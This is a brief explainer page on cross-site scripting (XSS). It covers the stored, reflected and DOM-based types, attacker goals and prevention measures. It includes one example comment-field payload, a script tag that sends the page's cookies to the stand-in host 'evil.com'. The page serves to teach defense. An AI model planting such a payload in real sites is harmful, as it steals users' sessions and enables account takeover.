Cross-Site Scripting (XSS)

Injecting Malicious Scripts

9 min read Updated 2025 High Risk

What is XSS?

Cross-Site Scripting (XSS) allows attackers to inject malicious scripts into web pages viewed by other users. The script runs in the victim's browser with the page's permissions.

xss-example

// Comment field input:

<script>document.location='evil.com?c='+document.cookie</script>

Types of XSS

Type	Description	Persistence
Stored	Script saved on server (comments, posts)	Permanent
Reflected	Script in URL, reflected back	Per-request
DOM-based	Script modifies page DOM	Client-side

What Attackers Can Do

Steal cookies/sessions - Account takeover
Keylogging - Capture typed data
Phishing - Display fake login forms
Malware distribution
Defacement - Modify page content

Prevention (For Developers)

Output encoding - HTML entity encoding
Content Security Policy (CSP)
Input validation
HttpOnly cookies - Can't access via JavaScript
Use modern frameworks - Auto-escaping

For Users

Don't click suspicious links
Use browser with XSS filtering
Keep browser updated
Use privacy extensions (uBlock Origin)